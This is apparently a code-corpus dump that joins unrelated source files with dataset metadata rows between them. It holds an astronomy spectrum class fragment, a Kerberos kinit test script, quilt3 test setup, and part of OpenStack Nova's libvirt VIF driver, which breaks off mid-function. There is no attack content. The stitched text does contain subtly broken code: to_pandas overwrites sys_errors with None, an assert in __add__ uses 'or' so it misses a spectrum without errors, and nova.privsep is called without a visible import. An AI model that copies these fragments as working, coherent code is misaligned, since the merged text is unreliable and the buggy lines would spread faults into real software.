:param pandas_dataframe: data frame containing information to be read into spectrum
:param exposure: the exposure of the spectrum
:param scale_factor: the scale factor of the spectrum
:param is_poisson: if the data are Poisson distributed
:param mission: (optional) the mission name
:param instrument: (optional) the instrument name
:return:
"""
# get the required columns
emin = np.array(pandas_dataframe['emin'])
emax = np.array(pandas_dataframe['emax'])
counts = np.array(pandas_dataframe['counts'])
ebounds = emin.tolist()
ebounds.append(emax[-1])
ebounds = ChannelSet.from_list_of_edges(ebounds)
# default optional parameters
count_errors = None
sys_errors = None
quality = None
if 'count_errors' in pandas_dataframe.keys():
count_errors = np.array(pandas_dataframe['count_errors'])
if 'sys_errors' in pandas_dataframe.keys():
sys_errors = np.array(pandas_dataframe['sys_errors'])
if 'quality' in pandas_dataframe.keys():
quality = Quality(np.array(pandas_dataframe['quality']))
return cls(counts=counts,
exposure=exposure,
ebounds=ebounds,
count_errors=count_errors,
sys_errors=sys_errors,
quality=quality,
scale_factor=scale_factor,
is_poisson=is_poisson,
mission=mission,
instrument=instrument)
def to_pandas(self,use_rate=True):
"""
make a pandas table from the spectrum.
:param use_rate: if the table should use rates or counts
:return:
"""
if use_rate:
out_name = 'rates'
out_values = self.rates
else:
out_name = 'counts'
out_values = self.rates * self.exposure
out_dict = {'emin': self.starts, 'emax': self.stops,out_name:out_values, 'quality': self.quality}
if self.rate_errors is not None:
if use_rate:
out_dict['rate_errors'] = self.rate_errors
else:
out_dict['count_errors'] =self.rate_errors * self.exposure
if self.sys_errors is not None:
out_dict['sys_errors'] = None
return pd.DataFrame(out_dict)
@classmethod
def from_time_series(cls, time_series, use_poly=False):
"""
:param time_series:
:param use_poly:
:return:
"""
raise NotImplementedError('This is still under construction')
pha_information = time_series.get_information_dict(use_poly)
is_poisson = True
if use_poly:
is_poisson = False
return cls(instrument=pha_information['instrument'],
mission=pha_information['telescope'],
tstart=pha_information['tstart'],
telapse=pha_information['telapse'],
#channel=pha_information['channel'],
counts=pha_information['counts'],
count_errors=pha_information['counts error'],
quality=pha_information['quality'],
grouping=pha_information['grouping'],
exposure=pha_information['exposure'],
backscale=1.,
is_poisson=is_poisson)
def __add__(self,other):
assert self == other, "The bins are not equal"
new_sys_errors=self.sys_errors
if new_sys_errors is None:
new_sys_errors=other.sys_errors
elif other.sys_errors is not None:
new_sys_errors += other.sys_errors
new_exposure = self.exposure + other.exposure
if self.count_errors is None and other.count_errors is None:
new_count_errors = None
else:
assert self.count_errors is not None or other.count_errors is not None, 'only one of the two spectra have errors, can not add!'
new_count_errors = (self.count_errors**2 + other.count_errors**2) ** 0.5
new_counts = self.counts + other.counts
new_spectrum = self.clone(new_counts=new_counts,
new_count_errors=new_count_errors,
new_exposure=new_exposure)
new_spectrum._tstart = min(self.tstart,other.tstart)
new_spectrum._tstop = max(self.tstop,other.tstop)
return new_spectrum
def add_inverse_variance_weighted(self, other):
assert self == other, "The bins are not equal"
if self.is_poisson or other.is_poisson:
raise Exception("Inverse_variance_weighting not implemented for poisson")
new_sys_errors=self.sys_errors
if new_sys_errors is None:
new_sys_errors=other.sys_errors
elif other.sys_errors is not None:
new_sys_errors += other.sys_errors
new_exposure = self.exposure + other.exposure
new_rate_errors = np.array([ (e1**-2 + e2**-2)**-0.5 for e1,e2 in zip(self.rate_errors,other._errors) ] )
new_rates = np.array( [ (c1*e1**-2 + c2*e2**-2) for c1,e1,c2,e2 in zip(self.rates,self._errors,other.rates, other._errors) ] ) * new_rate_errors**2
new_count_errors = new_rate_errors * new_exposure
new_counts = new_rates * new_exposure
new_counts[np.isnan(new_counts)]=0
new_count_errors[np.isnan(new_count_errors)]=0
new_spectrum = self.clone(new_counts=new_counts,
new_count_errors=new_count_errors)
new_spectrum._exposure = new_exposure
new_spectrum._tstart = min(self.tstart,other.tstart)
new_spectrum._tstop = max(self.tstop,other.tstop)
return new_spectrum
class BinnedSpectrumWithDispersion(BinnedSpectrum):
def __init__(self, counts, exposure, response, count_errors=None, sys_errors=None, quality=None, scale_factor=1.,
is_poisson=False, mission=None, instrument=None, tstart=None, tstop=None ):
"""
A binned spectrum that must be deconvolved via a dispersion or response matrix
:param counts:
:param exposure:
:param response:
:param count_errors:
:param sys_errors:
:param quality:
:param scale_factor:
:param is_poisson:
:param mission:
:param instrument:
"""
assert isinstance(response, InstrumentResponse), 'The response is not a valid instance of InstrumentResponse'
self._rsp = response
ebounds = ChannelSet.from_instrument_response(response)
super(BinnedSpectrumWithDispersion, self).__init__(counts=counts,
exposure=exposure,
ebounds=ebounds,
count_errors=count_errors,
sys_errors=sys_errors,
quality=quality,
scale_factor=scale_factor,
is_poisson=is_poisson,
mission=mission,
instrument=instrument,
tstart=tstart,
tstop=tstop)
@property
def response(self):
return self._rsp
@classmethod
def from_time_series(cls, time_series, response, use_poly=False):
"""
:param time_series:
:param use_poly:
:return:
"""
pha_information = time_series.get_information_dict(use_poly)
is_poisson = True
if use_poly:
is_poisson = False
return cls(instrument=pha_information['instrument'],
mission=pha_information['telescope'],
tstart=pha_information['tstart'],
tstop=pha_information['tstart'] + pha_information['telapse'],
#channel=pha_information['channel'],
counts =pha_information['counts'],
count_errors=pha_information['counts error'],
quality=pha_information['quality'],
#grouping=pha_information['grouping'],
exposure=pha_information['exposure'],
response=response,
scale_factor=1.,
is_poisson=is_poisson)
def clone(self, new_counts=None, new_count_errors=None, new_sys_errors=None, new_exposure=None):
"""
make a new spectrum with new counts and errors and all other
parameters the same
:param new_counts: new counts for the spectrum
:param new_count_errors: new errors from the spectrum
:return:
"""
if new_counts is None:
new_counts = self.counts
new_count_errors = self.count_errors
if new_sys_errors is None:
new_sys_errors = self.sys_errors
if new_exposure is None:
new_exposure = self.exposure
return BinnedSpectrumWithDispersion(counts=new_counts,
exposure=new_exposure,
response=self._rsp,
count_errors=new_count_errors,
sys_errors=new_sys_errors,
quality=self._quality,
scale_factor=self._scale_factor,
is_poisson=self._is_poisson,
mission=self._mission,
instrument=self._instrument)
def __add__(self,other):
#TODO implement equality in InstrumentResponse class
assert self.response is other.response
new_spectrum = super(BinnedSpectrumWithDispersion,self).__add__(other)
return new_spectrum
| bsd-3-clause | 6,971,004,834,332,659,000 | 27.194892 | 155 | 0.550794 | false |
drankye/kerb-token | krb5/src/tests/t_general.py | 1 | 2018 | #!/usr/bin/python
from k5test import *
for realm in multipass_realms(create_host=False):
# Check that kinit fails appropriately with the wrong password.
output = realm.run([kinit, realm.user_princ], input='wrong\n',
expected_code=1)
if 'Password incorrect while getting initial credentials' not in output:
fail('Expected error message not seen in kinit output')
# Check that we can kinit as a different principal.
realm.kinit(realm.admin_princ, password('admin'))
realm.klist(realm.admin_princ)
# Test FAST kinit.
fastpw = password('fast')
realm.run_kadminl('ank -pw %s +requires_preauth user/fast' % fastpw)
realm.kinit('user/fast', fastpw)
realm.kinit('user/fast', fastpw, flags=['-T', realm.ccache])
realm.klist('user/fast@%s' % realm.realm)
# Test kinit against kdb keytab
realm.run([kinit, "-k", "-t", "KDB:", realm.user_princ])
# Test that we can get initial creds with an empty password via the
# API. We have to disable the "empty" pwqual module to create a
# principal with an empty password. (Regression test for #7642.)
conf={'plugins': {'pwqual': {'disable': 'empty'}}}
realm = K5Realm(create_user=False, create_host=False, krb5_conf=conf)
realm.run_kadminl('addprinc -pw "" user')
realm.run(['./t_init_creds', 'user', ''])
realm.stop()
realm = K5Realm(create_host=False)
# Spot-check KRB5_TRACE output
tracefile = os.path.join(realm.testdir, 'trace')
realm.run(['env', 'KRB5_TRACE=' + tracefile, kinit, realm.user_princ],
input=(password('user') + "\n"))
f = open(tracefile, 'r')
trace = f.read()
f.close()
expected = ('Sending initial UDP request',
'Received answer',
'Selected etype info',
'AS key obtained',
'Decrypted AS reply',
'FAST negotiation: available',
'Storing [email protected]')
for e in expected:
if e not in trace:
fail('Expected output not in kinit trace log')
success('FAST kinit, trace logging')
| apache-2.0 | -8,659,719,704,759,129,000 | 36.37037 | 76 | 0.654113 | false |
quiltdata/quilt-compiler | api/python/tests/utils.py | 1 | 2013 | """
Unittest setup
"""
import pathlib
from unittest import mock, TestCase
import boto3
from botocore import UNSIGNED
from botocore.client import Config
from botocore.stub import Stubber
import responses
import quilt3
from quilt3.util import CONFIG_PATH
class QuiltTestCase(TestCase):
"""
Base class for unittests.
- Creates a mock config
- Creates a test client
- Mocks requests
"""
def setUp(self):
# Verify that CONFIG_PATH is in the test dir (patched by conftest.py).
assert 'pytest' in str(CONFIG_PATH)
quilt3.config(
navigator_url='https://example.com',
apiGatewayEndpoint='https://xyz.execute-api.us-east-1.amazonaws.com/prod',
binaryApiGatewayEndpoint='https://xyz.execute-api.us-east-1.amazonaws.com/prod',
default_local_registry=pathlib.Path('.').resolve().as_uri() + '/local_registry',
default_remote_registry='s3://example/',
default_install_location=None,
defaultBucket='test-bucket',
registryUrl='https://registry.example.com',
s3Proxy='open-s3-proxy.quiltdata.com'
)
self.requests_mock = responses.RequestsMock(assert_all_requests_are_fired=False)
self.requests_mock.start()
# Create a dummy S3 client that (hopefully) can't do anything.
boto_client = boto3.client('s3', config=Config(signature_version=UNSIGNED))
self.s3_client = boto_client
self.s3_client_patcher = mock.patch.multiple(
'quilt3.data_transfer.S3ClientProvider',
standard_client=boto_client,
find_correct_client=lambda *args, **kwargs: boto_client,
)
self.s3_client_patcher.start()
self.s3_stubber = Stubber(self.s3_client)
self.s3_stubber.activate()
def tearDown(self):
self.s3_stubber.assert_no_pending_responses()
self.s3_stubber.deactivate()
self.s3_client_patcher.stop()
self.requests_mock.stop()
| apache-2.0 | 8,618,915,299,598,966,000 | 32 | 92 | 0.64928 | false |
phenoxim/nova | nova/virt/libvirt/vif.py | 1 | 35641 | # Copyright (C) 2011 Midokura KK
# Copyright (C) 2011 Nicira, Inc
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
# Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""VIF drivers for libvirt."""
import os
import os_vif
from os_vif import exception as osv_exception
from os_vif.objects import fields as osv_fields
from oslo_concurrency import processutils
from oslo_log import log as logging
import nova.conf
from nova import exception
from nova.i18n import _
from nova.network import linux_net
from nova.network import linux_utils as linux_net_utils
from nova.network import model as network_model
from nova.network import os_vif_util
from nova import objects
from nova import profiler
from nova import utils
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import designer
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt import osinfo
LOG = logging.getLogger(__name__)
CONF = nova.conf.CONF
# vhostuser queues support
MIN_LIBVIRT_VHOSTUSER_MQ = (1, 2, 17)
# vlan tag for macvtap passthrough mode on SRIOV VFs
MIN_LIBVIRT_MACVTAP_PASSTHROUGH_VLAN = (1, 3, 5)
# virtio-net.rx_queue_size support
MIN_LIBVIRT_RX_QUEUE_SIZE = (2, 3, 0)
MIN_QEMU_RX_QUEUE_SIZE = (2, 7, 0)
# virtio-net.tx_queue_size support
MIN_LIBVIRT_TX_QUEUE_SIZE = (3, 7, 0)
MIN_QEMU_TX_QUEUE_SIZE = (2, 10, 0)
def is_vif_model_valid_for_virt(virt_type, vif_model):
valid_models = {
'qemu': [network_model.VIF_MODEL_VIRTIO,
network_model.VIF_MODEL_NE2K_PCI,
network_model.VIF_MODEL_PCNET,
network_model.VIF_MODEL_RTL8139,
network_model.VIF_MODEL_E1000,
network_model.VIF_MODEL_LAN9118,
network_model.VIF_MODEL_SPAPR_VLAN],
'kvm': [network_model.VIF_MODEL_VIRTIO,
network_model.VIF_MODEL_NE2K_PCI,
network_model.VIF_MODEL_PCNET,
network_model.VIF_MODEL_RTL8139,
network_model.VIF_MODEL_E1000,
network_model.VIF_MODEL_SPAPR_VLAN],
'xen': [network_model.VIF_MODEL_NETFRONT,
network_model.VIF_MODEL_NE2K_PCI,
network_model.VIF_MODEL_PCNET,
network_model.VIF_MODEL_RTL8139,
network_model.VIF_MODEL_E1000],
'lxc': [],
'uml': [],
'parallels': [network_model.VIF_MODEL_VIRTIO,
network_model.VIF_MODEL_RTL8139,
network_model.VIF_MODEL_E1000],
}
if vif_model is None:
return True
if virt_type not in valid_models:
raise exception.UnsupportedVirtType(virt=virt_type)
return vif_model in valid_models[virt_type]
@profiler.trace_cls("vif_driver")
class LibvirtGenericVIFDriver(object):
"""Generic VIF driver for libvirt networking."""
def _normalize_vif_type(self, vif_type):
return vif_type.replace('2.1q', '2q')
def get_vif_devname(self, vif):
if 'devname' in vif:
return vif['devname']
return ("nic" + vif['id'])[:network_model.NIC_NAME_LEN]
def get_vif_devname_with_prefix(self, vif, prefix):
devname = self.get_vif_devname(vif)
return prefix + devname[3:]
def get_base_config(self, instance, mac, image_meta,
inst_type, virt_type, vnic_type, host):
# TODO(sahid): We should rewrite it. This method handles too
# many unrelated things. We probably need to have a specific
# virtio, vhost, vhostuser functions.
conf = vconfig.LibvirtConfigGuestInterface()
# Default to letting libvirt / the hypervisor choose the model
model = None
driver = None
vhost_queues = None
# If the user has specified a 'vif_model' against the
# image then honour that model
if image_meta:
model = osinfo.HardwareProperties(image_meta).network_model
# Else if the virt type is KVM/QEMU/VZ(Parallels), then use virtio
# according to the global config parameter
if (model is None and
virt_type in ('kvm', 'qemu', 'parallels') and
CONF.libvirt.use_virtio_for_bridges):
model = network_model.VIF_MODEL_VIRTIO
# Workaround libvirt bug, where it mistakenly
# enables vhost mode, even for non-KVM guests
if (model == network_model.VIF_MODEL_VIRTIO and
virt_type == "qemu"):
driver = "qemu"
if not is_vif_model_valid_for_virt(virt_type,
model):
raise exception.UnsupportedHardware(model=model,
virt=virt_type)
if (virt_type in ('kvm', 'parallels') and
model == network_model.VIF_MODEL_VIRTIO and
vnic_type not in network_model.VNIC_TYPES_SRIOV):
vhost_drv, vhost_queues = self._get_virtio_mq_settings(image_meta,
inst_type)
# TODO(sahid): It seems that we return driver 'vhost' even
# for vhostuser interface where for vhostuser interface
# the driver should be 'vhost-user'. That currently does
# not create any issue since QEMU ignores the driver
# argument for vhostuser interface but we should probably
# fix that anyway. Also we should enforce that the driver
# use vhost and not None.
driver = vhost_drv or driver
rx_queue_size = None
if driver == 'vhost' or driver is None:
# vhost backend only supports update of RX queue size
rx_queue_size, _ = self._get_virtio_queue_sizes(host)
if rx_queue_size:
# TODO(sahid): Specifically force driver to be vhost
# that because if None we don't generate the XML
# driver element needed to set the queue size
# attribute. This can be removed when get_base_config
# will be fixed and rewrite to set the correct
# backend.
driver = 'vhost'
designer.set_vif_guest_frontend_config(
conf, mac, model, driver, vhost_queues, rx_queue_size)
return conf
def get_base_hostdev_pci_config(self, vif):
conf = vconfig.LibvirtConfigGuestHostdevPCI()
pci_slot = vif['profile']['pci_slot']
designer.set_vif_host_backend_hostdev_pci_config(conf, pci_slot)
return conf
def _is_multiqueue_enabled(self, image_meta, flavor):
_, vhost_queues = self._get_virtio_mq_settings(image_meta, flavor)
return vhost_queues > 1 if vhost_queues is not None else False
def _get_virtio_mq_settings(self, image_meta, flavor):
"""A methods to set the number of virtio queues,
if it has been requested in extra specs.
"""
driver = None
vhost_queues = None
if not isinstance(image_meta, objects.ImageMeta):
image_meta = objects.ImageMeta.from_dict(image_meta)
img_props = image_meta.properties
if img_props.get('hw_vif_multiqueue_enabled'):
driver = 'vhost'
max_tap_queues = self._get_max_tap_queues()
if max_tap_queues:
vhost_queues = (max_tap_queues if flavor.vcpus > max_tap_queues
else flavor.vcpus)
else:
vhost_queues = flavor.vcpus
return (driver, vhost_queues)
def _get_max_tap_queues(self):
# NOTE(kengo.sakai): In kernels prior to 3.0,
# multiple queues on a tap interface is not supported.
# In kernels 3.x, the number of queues on a tap interface
# is limited to 8. From 4.0, the number is 256.
# See: https://bugs.launchpad.net/nova/+bug/1570631
kernel_version = int(os.uname()[2].split(".")[0])
if kernel_version <= 2:
return 1
elif kernel_version == 3:
return 8
elif kernel_version == 4:
return 256
else:
return None
def get_bridge_name(self, vif):
return vif['network']['bridge']
def get_ovs_interfaceid(self, vif):
return vif.get('ovs_interfaceid') or vif['id']
def get_veth_pair_names(self, iface_id):
return (("qvb%s" % iface_id)[:network_model.NIC_NAME_LEN],
("qvo%s" % iface_id)[:network_model.NIC_NAME_LEN])
@staticmethod
def is_no_op_firewall():
return CONF.firewall_driver == "nova.virt.firewall.NoopFirewallDriver"
def get_firewall_required_os_vif(self, vif):
if vif.has_traffic_filtering:
return False
if self.is_no_op_firewall():
return False
return True
def get_config_802qbg(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
params = vif["qbg_params"]
designer.set_vif_host_backend_802qbg_config(
conf, vif['network'].get_meta('interface'),
params['managerid'],
params['typeid'],
params['typeidversion'],
params['instanceid'])
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_802qbh(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
profile = vif["profile"]
vif_details = vif["details"]
net_type = 'direct'
if vif['vnic_type'] == network_model.VNIC_TYPE_DIRECT:
net_type = 'hostdev'
designer.set_vif_host_backend_802qbh_config(
conf, net_type, profile['pci_slot'],
vif_details[network_model.VIF_DETAILS_PROFILEID])
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_hw_veb(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
profile = vif["profile"]
vif_details = vif["details"]
net_type = 'direct'
if vif['vnic_type'] == network_model.VNIC_TYPE_DIRECT:
net_type = 'hostdev'
designer.set_vif_host_backend_hw_veb(
conf, net_type, profile['pci_slot'],
vif_details[network_model.VIF_DETAILS_VLAN])
# NOTE(vladikr): Not setting vlan tags for macvtap on SR-IOV VFs
# as vlan tag is not supported in Libvirt until version 1.3.5
if (vif['vnic_type'] == network_model.VNIC_TYPE_MACVTAP and not
host.has_min_version(MIN_LIBVIRT_MACVTAP_PASSTHROUGH_VLAN)):
conf.vlan = None
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_hostdev_physical(self, instance, vif, image_meta,
inst_type, virt_type, host):
return self.get_base_hostdev_pci_config(vif)
def get_config_macvtap(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
vif_details = vif['details']
macvtap_src = vif_details.get(network_model.VIF_DETAILS_MACVTAP_SOURCE)
macvtap_mode = vif_details.get(network_model.VIF_DETAILS_MACVTAP_MODE)
phys_interface = vif_details.get(
network_model.VIF_DETAILS_PHYS_INTERFACE)
missing_params = []
if macvtap_src is None:
missing_params.append(network_model.VIF_DETAILS_MACVTAP_SOURCE)
if macvtap_mode is None:
missing_params.append(network_model.VIF_DETAILS_MACVTAP_MODE)
if phys_interface is None:
missing_params.append(network_model.VIF_DETAILS_PHYS_INTERFACE)
if len(missing_params) > 0:
raise exception.VifDetailsMissingMacvtapParameters(
vif_id=vif['id'],
missing_params=missing_params)
designer.set_vif_host_backend_direct_config(
conf, macvtap_src, macvtap_mode)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_iovisor(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev, host)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_midonet(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev, host)
return conf
def get_config_tap(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev, host)
return conf
def _get_vhostuser_settings(self, vif):
vif_details = vif['details']
mode = vif_details.get(network_model.VIF_DETAILS_VHOSTUSER_MODE,
'server')
sock_path = vif_details.get(network_model.VIF_DETAILS_VHOSTUSER_SOCKET)
if sock_path is None:
raise exception.VifDetailsMissingVhostuserSockPath(
vif_id=vif['id'])
return mode, sock_path
def get_config_vhostuser(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
# TODO(sahid): We should never configure a driver backend for
# vhostuser interface. Specifically override driver to use
# None. This can be removed when get_base_config will be fixed
# and rewrite to set the correct backend.
conf.driver_name = None
mode, sock_path = self._get_vhostuser_settings(vif)
rx_queue_size, tx_queue_size = self._get_virtio_queue_sizes(host)
designer.set_vif_host_backend_vhostuser_config(
conf, mode, sock_path, rx_queue_size, tx_queue_size)
# (vladikr) Not setting up driver and queues for vhostuser
# as queues are not supported in Libvirt until version 1.2.17
if not host.has_min_version(MIN_LIBVIRT_VHOSTUSER_MQ):
LOG.debug('Queues are not a vhostuser supported feature.')
conf.vhost_queues = None
return conf
def _get_virtio_queue_sizes(self, host):
"""Returns rx/tx queue sizes configured or (None, None)
Based on tx/rx queue sizes configured on host (nova.conf). The
methods check whether the versions of libvirt and QEMU are
corrects.
"""
# TODO(sahid): For vhostuser interface this function is called
# from get_base_config and also from the method reponsible to
# configure vhostuser interface meaning that the logs can be
# duplicated. In future we want to rewrite get_base_config.
rx, tx = CONF.libvirt.rx_queue_size, CONF.libvirt.tx_queue_size
if rx and not host.has_min_version(
MIN_LIBVIRT_RX_QUEUE_SIZE, MIN_QEMU_RX_QUEUE_SIZE):
LOG.warning('Setting RX queue size requires libvirt %s and QEMU '
'%s version or greater.',
libvirt_utils.version_to_string(
MIN_LIBVIRT_RX_QUEUE_SIZE),
libvirt_utils.version_to_string(
MIN_QEMU_RX_QUEUE_SIZE))
rx = None
if tx and not host.has_min_version(
MIN_LIBVIRT_TX_QUEUE_SIZE, MIN_QEMU_TX_QUEUE_SIZE):
LOG.warning('Setting TX queue size requires libvirt %s and QEMU '
'%s version or greater.',
libvirt_utils.version_to_string(
MIN_LIBVIRT_TX_QUEUE_SIZE),
libvirt_utils.version_to_string(
MIN_QEMU_TX_QUEUE_SIZE))
tx = None
return rx, tx
def get_config_ib_hostdev(self, instance, vif, image_meta,
inst_type, virt_type, host):
return self.get_base_hostdev_pci_config(vif)
def get_config_vrouter(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev, host)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def _set_config_VIFGeneric(self, instance, vif, conf, host):
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev, host)
def _set_config_VIFBridge(self, instance, vif, conf, host=None):
conf.net_type = "bridge"
conf.source_dev = vif.bridge_name
conf.target_dev = vif.vif_name
if self.get_firewall_required_os_vif(vif):
mac_id = vif.address.replace(':', '')
name = "nova-instance-" + instance.name + "-" + mac_id
conf.filtername = name
def _set_config_VIFOpenVSwitch(self, instance, vif, conf, host=None):
conf.net_type = "bridge"
conf.source_dev = vif.bridge_name
conf.target_dev = vif.vif_name
self._set_config_VIFPortProfile(instance, vif, conf)
def _set_config_VIFVHostUser(self, instance, vif, conf, host=None):
# TODO(sahid): We should never configure a driver backend for
# vhostuser interface. Specifically override driver to use
# None. This can be removed when get_base_config will be fixed
# and rewrite to set the correct backend.
conf.driver_name = None
rx_queue_size, tx_queue_size = self._get_virtio_queue_sizes(host)
designer.set_vif_host_backend_vhostuser_config(
conf, vif.mode, vif.path, rx_queue_size, tx_queue_size)
if not host.has_min_version(MIN_LIBVIRT_VHOSTUSER_MQ):
LOG.debug('Queues are not a vhostuser supported feature.')
conf.vhost_queues = None
def _set_config_VIFHostDevice(self, instance, vif, conf, host=None):
if vif.dev_type == osv_fields.VIFHostDeviceDevType.ETHERNET:
# This sets the required fields for an <interface type='hostdev'>
# section in a libvirt domain (by using a subset of hw_veb's
# options).
designer.set_vif_host_backend_hw_veb(
conf, 'hostdev', vif.dev_address, None)
else:
# TODO(jangutter): dev_type == VIFHostDeviceDevType.GENERIC
# is currently unsupported under os-vif. The corresponding conf
# class would be: LibvirtConfigGuestHostdevPCI
# but os-vif only returns a LibvirtConfigGuestInterface object
raise exception.InternalError(
_("Unsupported os-vif VIFHostDevice dev_type %(type)s") %
{'type': vif.dev_type})
def _set_config_VIFPortProfileOpenVSwitch(self, profile, conf):
conf.vporttype = "openvswitch"
conf.add_vport_param("interfaceid",
profile.interface_id)
def _set_config_VIFPortProfile(self, instance, vif, conf):
# Set any port profile that may be required
profilefunc = "_set_config_" + vif.port_profile.obj_name()
func = getattr(self, profilefunc, None)
if not func:
raise exception.InternalError(
_("Unsupported VIF port profile type %(obj)s func %(func)s") %
{'obj': vif.port_profile.obj_name(), 'func': profilefunc})
func(vif.port_profile, conf)
def _get_config_os_vif(self, instance, vif, image_meta, inst_type,
virt_type, host, vnic_type):
"""Get the domain config for a VIF
:param instance: nova.objects.Instance
:param vif: os_vif.objects.vif.VIFBase subclass
:param image_meta: nova.objects.ImageMeta
:param inst_type: nova.objects.Flavor
:param virt_type: virtualization type
:param host: nova.virt.libvirt.host.Host
:param vnic_type: vnic type
:returns: nova.virt.libvirt.config.LibvirtConfigGuestInterface
"""
# Do the config that's common to all vif types
conf = self.get_base_config(instance, vif.address, image_meta,
inst_type, virt_type, vnic_type,
host)
# Do the VIF type specific config
viffunc = "_set_config_" + vif.obj_name()
func = getattr(self, viffunc, None)
if not func:
raise exception.InternalError(
_("Unsupported VIF type %(obj)s func %(func)s") %
{'obj': vif.obj_name(), 'func': viffunc})
func(instance, vif, conf, host)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config(self, instance, vif, image_meta,
inst_type, virt_type, host):
vif_type = vif['type']
vnic_type = vif['vnic_type']
# instance.display_name could be unicode
instance_repr = utils.get_obj_repr_unicode(instance)
LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
'vif=%(vif)s virt_type=%(virt_type)s',
{'vif_type': vif_type, 'instance': instance_repr,
'vif': vif, 'virt_type': virt_type})
if vif_type is None:
raise exception.InternalError(
_("vif_type parameter must be present "
"for this vif_driver implementation"))
# Try os-vif codepath first
vif_obj = os_vif_util.nova_to_osvif_vif(vif)
if vif_obj is not None:
return self._get_config_os_vif(instance, vif_obj, image_meta,
inst_type, virt_type, host,
vnic_type)
# Legacy non-os-vif codepath
vif_slug = self._normalize_vif_type(vif_type)
func = getattr(self, 'get_config_%s' % vif_slug, None)
if not func:
raise exception.InternalError(
_("Unexpected vif_type=%s") % vif_type)
return func(instance, vif, image_meta,
inst_type, virt_type, host)
def plug_ib_hostdev(self, instance, vif):
fabric = vif.get_physical_network()
if not fabric:
raise exception.NetworkMissingPhysicalNetwork(
network_uuid=vif['network']['id']
)
pci_slot = vif['profile']['pci_slot']
device_id = instance['uuid']
vnic_mac = vif['address']
try:
nova.privsep.libvirt.plug_infiniband_vif(
vnic_mac, device_id, fabric,
network_model.VIF_TYPE_IB_HOSTDEV, pci_slot)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while plugging ib hostdev vif"),
instance=instance)
def plug_802qbg(self, instance, vif):
pass
def plug_802qbh(self, instance, vif):
pass
def plug_hw_veb(self, instance, vif):
# TODO(vladikr): This code can be removed once the minimum version of
# Libvirt is incleased above 1.3.5, as vlan will be set by libvirt
if vif['vnic_type'] == network_model.VNIC_TYPE_MACVTAP:
linux_net_utils.set_vf_interface_vlan(
vif['profile']['pci_slot'],
mac_addr=vif['address'],
vlan=vif['details'][network_model.VIF_DETAILS_VLAN])
def plug_hostdev_physical(self, instance, vif):
pass
def plug_macvtap(self, instance, vif):
vif_details = vif['details']
vlan = vif_details.get(network_model.VIF_DETAILS_VLAN)
if vlan:
vlan_name = vif_details.get(
network_model.VIF_DETAILS_MACVTAP_SOURCE)
phys_if = vif_details.get(network_model.VIF_DETAILS_PHYS_INTERFACE)
linux_net.LinuxBridgeInterfaceDriver.ensure_vlan(
vlan, phys_if, interface=vlan_name)
def plug_midonet(self, instance, vif):
"""Plug into MidoNet's network port
Bind the vif to a MidoNet virtual port.
"""
dev = self.get_vif_devname(vif)
port_id = vif['id']
try:
linux_net_utils.create_tap_dev(dev)
nova.privsep.libvirt.plug_midonet_vif(port_id, dev)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while plugging vif"), instance=instance)
def plug_iovisor(self, instance, vif):
"""Plug using PLUMgrid IO Visor Driver
Connect a network device to their respective
Virtual Domain in PLUMgrid Platform.
"""
dev = self.get_vif_devname(vif)
iface_id = vif['id']
linux_net_utils.create_tap_dev(dev)
net_id = vif['network']['id']
tenant_id = instance.project_id
try:
nova.privsep.libvirt.plug_plumgrid_vif(
dev, iface_id, vif['address'], net_id, tenant_id)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while plugging vif"), instance=instance)
def plug_tap(self, instance, vif):
"""Plug a VIF_TYPE_TAP virtual interface."""
dev = self.get_vif_devname(vif)
mac = vif['details'].get(network_model.VIF_DETAILS_TAP_MAC_ADDRESS)
